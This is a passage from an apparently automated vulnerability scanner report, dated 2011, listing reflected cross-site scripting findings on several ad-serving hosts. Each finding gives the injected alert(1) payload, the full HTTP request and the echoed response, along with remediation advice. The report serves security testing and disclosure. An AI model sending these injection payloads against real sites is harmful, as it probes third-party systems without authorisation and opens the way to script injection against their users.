Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f835585'%3balert(1)//18083999448&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:43 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5376
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f835585';alert(1)//18083999448" target="_blank">
...[SNIP]...

2.35. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec380'%3balert(1)//a42125f2184 was submitted in the mpvc parameter. This input was echoed as ec380';alert(1)//a42125f2184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3Dec380'%3balert(1)//a42125f2184 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:55 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5372
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=ec380';alert(1)//a42125f2184http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8" target="_blank">
...[SNIP]...

2.36. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f3af"%3balert(1)//a5a21f89626 was submitted in the mpvc parameter. This input was echoed as 3f3af";alert(1)//a5a21f89626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D3f3af"%3balert(1)//a5a21f89626 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:53 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5372
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=3f3af";alert(1)//a5a21f89626");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3G
...[SNIP]...

2.37. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9608/119290/ph1-gps-findyourself-728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36f80"%3balert(1)//26b30fe8258 was submitted in the mpck parameter. This input was echoed as 36f80";alert(1)//26b30fe8258 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9608/119290/ph1-gps-findyourself-728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D451434730536f80"%3balert(1)//26b30fe8258&mpt=4514347305&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:12 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:47:36 GMT
ETag: "6efc8a-c12-498a5f51a2600"
Accept-Ranges: bytes
Content-Length: 6472
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
k/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg=http://adfarm.mediaplex.com/ad/ck/9608-119290-2042-5?mpt=451434730536f80";alert(1)//26b30fe8258\" target=\"_blank\">
...[SNIP]...

2.38. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9608/119290/ph1-gps-findyourself-728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52687"%3balert(1)//9b5fe7461cc was submitted in the mpvc parameter. This input was echoed as 52687";alert(1)//9b5fe7461cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9608/119290/ph1-gps-findyourself-728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D4514347305&mpt=4514347305&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg=52687"%3balert(1)//9b5fe7461cc HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:22 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:47:36 GMT
ETag: "6efc8a-c12-498a5f51a2600"
Accept-Ranges: bytes
Content-Length: 6448
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
hVars\" VALUE=\"clickTAG=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg=52687";alert(1)//9b5fe7461cchttp://adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D4514347305&clickTag=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799
...[SNIP]...

2.39. http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9608/119290/ph2_misc_longterm_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c991"%3balert(1)//9cb4a7a4bbe was submitted in the mpck parameter. This input was echoed as 5c991";alert(1)//9cb4a7a4bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9608/119290/ph2_misc_longterm_728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D24376763225c991"%3balert(1)//9cb4a7a4bbe&mpt=2437676322&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:10 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:55:41 GMT
ETag: "5e6bfb-c07-498a61202a940"
Accept-Ranges: bytes
Content-Length: 6461
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
k/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg=http://adfarm.mediaplex.com/ad/ck/9608-119290-2042-5?mpt=24376763225c991";alert(1)//9cb4a7a4bbe\" target=\"_blank\">
...[SNIP]...

2.40. http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/9608/119290/ph2_misc_longterm_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e0f6"%3balert(1)//8131ab997d4 was submitted in the mpvc parameter. This input was echoed as 1e0f6";alert(1)//8131ab997d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/9608/119290/ph2_misc_longterm_728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D2437676322&mpt=2437676322&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg=1e0f6"%3balert(1)//8131ab997d4 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:20 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:55:41 GMT
ETag: "5e6bfb-c07-498a61202a940"
Accept-Ranges: bytes
Content-Length: 6437
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
hVars\" VALUE=\"clickTAG=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg=1e0f6";alert(1)//8131ab997d4http://adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D2437676322&clickTag=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799
...[SNIP]...

2.41. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b4d9f<script>alert(1)</script>7e1b748a12 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G08769b4d9f<script>alert(1)</script>7e1b748a12 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 07 Sep 2011 14:14:43 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 08 Sep 2011 14:14:43 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:42 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "G08769B4D9F<SCRIPT>ALERT(1)</SCRIPT>7E1B748A12" was not recognized.
*/

2.42. http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /images/sprite-widget-17.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe631"a%3d"b"7b2b26a4785 was submitted in the REST URL parameter 1. This input was echoed as fe631"a="b"7b2b26a4785 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesfe631"a%3d"b"7b2b26a4785/sprite-widget-17.png?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 65
Status: 404
Vary: Accept-Encoding
Content-Length: 36586
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:02 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/imagesfe631"a="b"7b2b26a4785/sprite-widget-17.png">
...[SNIP]...

2.43. http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /images/sprite-widget-17.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63eb5"a%3d"b"8301f8a2a40 was submitted in the REST URL parameter 2. This input was echoed as 63eb5"a="b"8301f8a2a40 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/sprite-widget-17.png63eb5"a%3d"b"8301f8a2a40?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 286
Status: 404
Vary: Accept-Encoding
Content-Length: 36586
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:15 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/images/sprite-widget-17.png63eb5"a="b"8301f8a2a40">
...[SNIP]...

2.44. http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /images/sprite-widget-logos.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d37ce"a%3d"b"69269d76801 was submitted in the REST URL parameter 1. This input was echoed as d37ce"a="b"69269d76801 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesd37ce"a%3d"b"69269d76801/sprite-widget-logos.png?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 62
Status: 404
Vary: Accept-Encoding
Content-Length: 36592
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:01 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/imagesd37ce"a="b"69269d76801/sprite-widget-logos.png">
...[SNIP]...

2.45. http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /images/sprite-widget-logos.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a301"a%3d"b"aa15a3c938b was submitted in the REST URL parameter 2. This input was echoed as 8a301"a="b"aa15a3c938b in the application's response.

